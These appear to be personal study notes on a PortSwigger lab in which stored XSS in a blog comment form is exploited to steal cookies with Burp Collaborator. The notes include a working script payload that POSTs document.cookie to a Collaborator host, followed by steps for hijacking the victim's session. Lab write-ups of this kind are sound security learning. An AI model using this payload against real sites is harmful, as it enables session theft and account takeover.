Below are detailed notes demonstrating how to practically [exploit stored](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies) Cross-Site Scripting (XSS) in blog comments to steal cookies, using _Burp Suite Professional_ and _Burp Collaborator_. ##### **Step-by-step Exploitation** **1. Identifying the XSS Vulnerability** - The vulnerable function is the **blog comments** form. - Initial validation confirms the insertion of arbitrary HTML tags like `<u>` is possible, indicating a stored XSS vulnerability. Example test payload: ```html <u>test</u> ``` This confirms HTML injection. ![[CleanShot 2025-04-12 at 12.35.12.png]] --- **2. Setting up Burp Collaborator** - In **Burp Suite Professional**, navigate to: ``` Burp Suite → Collaborator Tab → Copy to clipboard ``` - Your unique Collaborator domain will look like: ``` yoursubdomain.burpcollaborator.net ``` --- **3. Crafting and Deploying the Exploit Payload** Use a JavaScript payload to fetch and exfiltrate the victim's cookie to Burp Collaborator. Example payload: ```html <script> fetch('https://yoursubdomain.burpcollaborator.net', { method: 'POST', mode: 'no-cors', body: document.cookie }); </script> ``` - Replace `yoursubdomain.burpcollaborator.net` with your copied Collaborator subdomain. Submit this script as a new blog comment. --- **4. Triggering the Exploit** - When a victim (simulated user) visits the blog comments page, their browser automatically executes your injected JavaScript payload. - The victim’s session cookie is silently POSTed to your Collaborator subdomain. ![[CleanShot 2025-04-12 at 12.37.16.png]] --- **5. Retrieving the Cookie** - In **Burp Collaborator** tab: ``` Click “Poll now” to view incoming HTTP requests. ``` - You will see an HTTP interaction containing the stolen cookie within the POST body. - Record the victim’s cookie value, for example: ``` session=abcd1234efgh5678ijkl9012mnop3456; ``` ![[CleanShot 2025-04-12 at 12.37.49.png]] --- **6. Session Hijacking** - Replace your browser session cookie with the stolen victim cookie - At the time of writing a like [Cookie-Editor](https://chromewebstore.google.com/detail/hlkenndednhfkekhgcdicdfddnkalmdm?utm_source=item-share-cb) best for it's simplicity ![[CleanShot 2025-04-12 at 12.39.15.png]] - Successful impersonation typically redirects you to the victim’s (e.g., admin's) account page. ![[CleanShot 2025-04-12 at 12.40.24.png]]